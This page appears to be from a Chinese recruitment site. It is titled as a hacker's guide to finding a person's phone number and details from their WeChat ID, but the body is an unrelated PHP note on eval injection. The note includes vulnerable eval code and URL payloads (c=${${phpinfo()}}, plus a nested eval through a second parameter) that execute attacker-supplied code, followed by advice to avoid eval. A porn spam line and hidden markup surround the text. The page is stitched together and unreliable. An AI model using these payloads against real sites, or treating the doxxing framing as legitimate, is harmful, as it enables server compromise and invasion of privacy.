<noframes id="vnl3v">
      <address id="vnl3v"></address>
      <noframes id="vnl3v"><address id="vnl3v"><th id="vnl3v"></th></address>

      <address id="vnl3v"><listing id="vnl3v"><meter id="vnl3v"></meter></listing></address>

        <form id="vnl3v"></form>
          您當前的位置:首頁 > 職場資訊 > 職場攻略

          黑客教你微信號查詢某人信息(微信號查手機號黑科技)

          來源:固始人才網 時間:2020-10-07 作者:固始人才網 瀏覽量:

          作者:phpeval

          前段時間一個程序出的問題。就和這差不多。


          復制代碼
          代碼如下:

          $code="${${eval($_GET[c])}}";
          ?> 


          對于上面的代碼。如果在URL提交http://www.phpeval.cn/test.php?c=phpinfo(); 就可以發現phpinfo()被執行了。而相應的提交c=echo 11111; 發現1111也被輸出了。這個代碼被執行了。

          (好些PHP的代碼在寫文件的時候。都沒有注意到這一點。他們在代碼中寫php的文件的時候。把代碼加在雙引號之內。然后過濾掉雙引號。認為這樣就不能執行了。實際上是可以的。)
          還有一些利用方式,比如:


          復制代碼
          代碼如下:

          $code=addslashes($_GET[c]);
          eval(""$code""); 
          ?> 


          提交 http://www.site.cn/test.php?c=${${phpinfo()}}; phpinfo()就被執行。如果提交
          http://www.site.cn/test.php?c=${${eval($_GET[d])}};&d=phpinfo();

          這樣的話,d后面的代碼也被執行。

          解決方法:

          eval函數減弱了你的應用的安全性,因為它給被求值的文本賦予了太多的權力。強烈建議不要使用eval函數。


          分享到:
          微信公眾號
          手機瀏覽

          固始人才網,讓招聘更簡單! 7×24小時QQ在線:850115555 蘇ICP備12049413號

          地址:信陽市八一路與新華路交匯處金源大廈 EMAIL:suihongkun@qq.com

          Powered by PHPYun.

          用微信掃一掃

          国产手机在线αⅴ片无码观看